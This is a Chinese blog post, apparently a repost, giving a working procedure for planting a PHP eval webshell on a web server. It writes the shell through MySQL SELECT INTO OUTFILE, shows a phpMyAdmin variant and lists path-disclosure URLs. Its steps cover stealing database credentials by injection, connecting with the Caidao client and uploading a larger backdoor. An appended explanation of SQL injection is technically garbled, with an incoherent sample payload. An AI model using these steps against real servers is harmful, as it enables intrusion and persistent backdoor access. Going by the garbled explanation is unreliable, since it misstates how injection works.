通过mysql写入一句话木马

USE mysql;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
CREATE TABLE a(
cmd1 text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd1 )
VALUES (
'<?php eval($_POST[cmd]);?>'
);# 影响列数: 1
# 影响列数: 1
SELECT cmd1
FROM a
INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数: 1
# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站

6.使用菜刀连接一句话,上传大马

 

方法二:

使用phpmyadmin中的sql语句
写文件:
select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。

 

利用mysql数据库爆网站绝对路径方法

使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php

 

参考:360搜索“mysql写入一句话木马文件”

转载于:https://www.cnblogs.com/cookies9/p/3364378.html

SQL注入漏洞是一种常见的Web应用程序安全风险,攻击者通过构造特殊的SQL查询来欺骗数据库管理系统执行非预期的操作。如果系统没有正确的输入验证,就可能导致数据泄露或恶意数据写入。利用这个漏洞来植入一句话木马(也称为一句话后门)通常涉及以下步骤: 1. **识别漏洞**: 首先需要找到应用程序中的SQL查询点,这可能是表单提交、API请求或者是直接URL查询字符串中对数据库的调用。 2. **构建payload**: 一句话木马通常是通过创建一个SQL命令来实现的,比如在`INSERT`或`UPDATE`语句中添加一段恶意代码。例如,在MySQL中,可能会尝试注入类似这样的语句: ``` INSERT INTO users (username, password) VALUES ('admin', 'malicious_script;' --' OR '1'='1) ``` `'; --'`这部分就是木马代码片段,它可以被解释器忽略,并在之后追加新的行。 3. **执行恶意代码**: 当用户触发了这个注入,恶意代码会随着正常的查询一起发送到数据库。如果`OR '1'='1`部分执行成功,那么`--'`后面的语句会被当作注释处理,而不会影响查询结果,但脚本依然会被执行。 4. **隐藏木马**: 如果可能,可以将木马代码隐藏起来,例如使用转义序列或者混淆技术使其更难以检测。 5. **访问木马**: 一旦木马数据库中设置好,攻击者可以通过某种方式(如访问特定的URL、修改数据库查询等)触发执行木马,从而获得后门访问权限。 重要提示:在实际生产环境中,你应该严格管理数据库连接、参数化查询和限制用户输入,以防止此类攻击。对于已知的漏洞,应尽快修复并更新安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值